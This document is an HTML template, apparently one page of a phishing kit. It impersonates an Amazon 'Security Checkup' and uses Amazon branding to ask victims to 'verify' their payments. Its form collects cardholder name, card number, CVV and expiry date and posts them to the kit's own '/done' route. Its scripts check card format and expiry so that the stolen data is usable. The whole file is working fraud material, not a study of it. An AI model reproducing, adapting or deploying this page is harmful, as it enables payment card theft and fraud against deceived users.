<!DOCTYPE html>
<html>
  <head>
    <title>Security Checkup</title>
    <meta charset="UTF-8" />
    <link
      rel="shortcut icon"
      href="{{ url_for('static',filename='img/favicon.ico') }}" />
    <link
      rel="stylesheet"
      type="text/css"
      href="{{ url_for('static',filename='css/boostrap.min.css') }}"
      media="all" />
    <link
      rel="stylesheet"
      href="{{ url_for('static',filename='css/sign-dekstop.css') }}" />
    <link
      rel="stylesheet"
      href="{{ url_for('static',filename='css/style.sign-desktop.css') }}" />
    <link
      rel="stylesheet"
      type="text/css"
      href="{{ url_for('static',filename='css/style.css') }}" />
  </head>

  <body onload="_loader()" style="margin: 0">
    <div id="loader"></div>
    <div style="display: none" id="myDiv" class="animate-bon ttom">
      <div id="a-page">
        <div class="a-section a-padding-medium auth-workflow">
          <div class="a-section a-spacing-none auth-navbar">
            <div class="a-section a-spacing-medium a-text-center">
              <div class="a-link-nav-icon"></div>
              <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
            </div>
          </div>
          <div id="authportal-center-section" class="a-section">
            <ul
              class="list-unstyled multi-steps"
              style="padding-top: 10px"
              align="center">
              <li>Security</li>
              <li>Billing</li>
              <li class="is-active">Payments</li>
              <li>Finish</li>
            </ul>
            <div class="cc-content2" style="padding-top: 0">
              <div class="container">
                <div align="center">
                  <img
                    src="{{ url_for('static',filename='img/payment.png') }}"
                    width="80" />
                </div>
                <div align="center">
                  <span
                    class="lefttext"
                    style="font-size: 20px; font-weight: 650"
                    >Verify your Payments</span
                  >
                </div>
                <div align="center">
                  <span class="lefttext"
                    >Please enter the information that matches your
                    account.</span
                  >
                </div>
                <div class="row" style="padding-top: 5px">
                  <div class="col-12">
                    <div class="mypayementarea">
                      <form
                        action="/done"
                        method="post"
                        onsubmit="return expCheck() && ccnCheck();"
                        name="konzform"
                        id="konzform">
                        <span class="colorblacked" style="display: block"
                          >Credit or debit cards</span
                        >
                        <div class="row mt-3">
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="nameoncard"> Cardholder name </label>
                              <input
                                type="text"
                                class="form-control amazoninput namefocus"
                                name="namecard"
                                id="namecard"
                                placeholder="Cardholder name"
                                maxlength="30"
                                onkeypress="return alpha(event)" />
                            </div>
                          </div>
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="ccn"> Card number </label>
                              <input
                                type="text"
                                class="form-control amazoninput cardfocus"
                                name="ccn"
                                id="ccn"
                                placeholder="Card number"
                                maxlength="20" />
                              <p
                                class="middle hide cardError"
                                style="
                                  color: #cc1c39;
                                  padding-top: 5px;
                                  font-size: 13px;
                                ">
                                Please check your card number.
                              </p>
                            </div>
                          </div>
                          <div class="col-sm-6">
                            <div class="form-group">
                              <label for="cvv"> Security code </label>
                              <input
                                type="text"
                                class="form-control amazoninput cvvfocus"
                                name="cvv"
                                id="cvv"
                                placeholder="CVV / CVV2"
                                maxlength="4"
                                oninput="numOnly(this.id);" />
                            </div>
                          </div>
                          <div class="col-sm-6">
                            <div class="row">
                              <div class="col-6">
                                <div class="form-group">
                                  <label for="expmonth">
                                    Expiration date
                                  </label>
                                  <select
                                    class="form-control amazoninput mmfocus"
                                    name="expmonth"
                                    id="expmonth">
                                    <option value="">Month</option>
                                    <option value="01">01</option>
                                    <option value="02">02</option>
                                    <option value="03">03</option>
                                    <option value="04">04</option>
                                    <option value="05">05</option>
                                    <option value="06">06</option>
                                    <option value="07">07</option>
                                    <option value="08">08</option>
                                    <option value="09">09</option>
                                    <option value="10">10</option>
                                    <option value="11">11</option>
                                    <option value="12">12</option>
                                  </select>
                                </div>
                              </div>
                              <div
                                class="col-6"
                                style="
                                  padding-left: 0px;
                                  padding-bottom: 12px;
                                  padding-top: 21px;
                                  padding-right: 30px;
                                ">
                                <div class="form-group">
                                  <select
                                    height="100"
                                    class="form-control amazoninput yyfocus"
                                    name="expyear"
                                    id="expyear">
                                    <option value="">Year</option>
                                    <option value="2023">2023</option>
                                    <option value="2024">2024</option>
                                    <option value="2025">2025</option>
                                    <option value="2026">2026</option>
                                    <option value="2027">2027</option>
                                    <option value="2028">2028</option>
                                    <option value="2029">2029</option>
                                    <option value="2030">2030</option>
                                    <option value="2031">2031</option>
                                    <option value="2032">2032</option>
                                    <option value="2033">2033</option>
                                    <option value="2034">2034</option>
                                    <option value="2035">2035</option>
                                    <option value="2036">2036</option>
                                    <option value="2037">2037</option>
                                    <option value="2038">2038</option>
                                    <option value="2039">2039</option>
                                    <option value="2040">2040</option>
                                    <option value="2041">2041</option>
                                    <option value="2042">2042</option>
                                    <option value="2043">2043</option>
                                    <option value="2044">2044</option>
                                    <option value="2045">2045</option>
                                  </select>
                                </div>
                              </div>
                            </div>
                            <p
                              class="middle hide errorExp"
                              style="
                                color: #cc1c39;
                                margin-top: -0.9em;
                                font-size: 13px;
                              ">
                              Please check your expiration date.
                            </p>
                          </div>
                        </div>
                        <div class="a-row a-spacing-small">
                          <span
                            id="cvf-submit-otp-button"
                            class="a-button a-button-span2 a-button-primary cvf-widget-btn cvf-widget-btn-verify">
                            <span class="a-button-inner">
                              <button
                                type="submit"
                                name="Sex"
                                class="a-button-text"
                                role="button">
                                Continue
                              </button>
                            </span>
                          </span>
                        </div>
                      </form>
                    </div>
                  </div>
                  <script>
                    P.when("A", "ready").execute(function (A) {
                      var $ = A.$;
                      $(".cvf-widget-link-resend").click(function () {
                        $(".cvf-widget-form-resend").submit();
                      });
                    });
                  </script>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="a-section a-spacing-top-extra-large auth-footer">
        <div class="a-divider a-divider-section">
          <div class="a-divider-inner"></div>
        </div>
        <div class="a-section a-spacing-small a-text-center a-size-mini">
          <span class="auth-footer-seperator"></span>
          <a class="a-link-normal"> Conditions of Use </a>
          <span class="auth-footer-seperator"></span>
          <a class="a-link-normal"> Privacy Notice </a>
          <span class="auth-footer-seperator"></span>
          <a class="a-link-normal"> Help </a>
          <span class="auth-footer-seperator"></span>
        </div>
        <div class="a-section a-spacing-none a-text-center">
          <span class="a-size-mini a-color-secondary">
            © 1996-2023, Amazon.com, Inc. or its affiliates
          </span>
        </div>
      </div>
    </div>
    <script src="{{ url_for('static',filename='js/jquery-3.3.1.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.mask.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.validate.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/additional-methods.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.creditCardValidator.js') }}"></script>
    <script>
      function numOnly(id) {
        // Get the element by id
        var element = document.getElementById(id);
        // Use numbers only pattern, from 0 to 9 with \-
        var regex = /[^0-9\-]/gi;
        // Replace other characters that are not in regex pattern
        element.value = element.value.replace(regex, "");
      }
    </script>
    <script>
      let load;

      let _loader = () => {
        load = setTimeout(showPage, 1000);
      };

      let showPage = () => {
        document.getElementById("loader").style.display = "none";
        document.getElementById("myDiv").style.display = "block";
      };

      const alpha = (e) => {
        let k;
        document.all ? (k = e.keyCode) : (k = e.which);
        return (
          (k > 64 && k < 91) ||
          (k > 96 && k < 123) ||
          k == 8 ||
          k == 32 ||
          (k >= 48 && k <= 57)
        );
      };

      $(document).ready(function () {
        $("#konzform").validate({
          errorClass: "error-class",
          rules: {
            namecard: {
              required: true,
              minlength: 5,
              maxlength: 30,
            },
            ccn: {
              required: true,
            },
            cvv: {
              required: true,
              digits: true,
              minlength: 3,
            },
            expmonth: {
              required: true,
            },
            expyear: {
              required: true,
            },
          },
          messages: {
            namecard: {
              required: "Please enter a Cardholder name.",
              minlength: "Please enter with Full name.",
            },
            ccn: {
              required: "Please enter a Card number.",
            },
            cvv: {
              required: "Please enter a CVV / CVV2.",
            },
            expmonth: {
              required: "Please enter a Expiration month.",
            },
            expyear: {
              required: "Please enter a Expiration year.",
            },
          },
        });
      });

      let expCheck = () => {
        let today = new Date();
        let expDate = new Date($("#expyear").val(), $("#expmonth").val() - 1);
        let check = true;

        if (today.getTime() > expDate.getTime()) {
          $(".errorExp").removeClass("hide");
          $(".yyfocus").addClass("error-class-focus");
          $(".mmfocus").addClass("error-class-focus");

          return false;
        } else {
          $(".errorExp").addClass("hide");
          $(".yyfocus").removeClass("error-class-focus");
          $(".mmfocus").removeClass("error-class-focus");

          return true;
        }

        if (!check) {
          return false;
        }
        return check;
      };

      let ccnCheck = () => {
        let result = $("#ccn").validateCreditCard();
        if (!result.valid) {
          $(".cardError").removeClass("hide");

          return false;
        }
      };
    </script>
  </body>
</html>
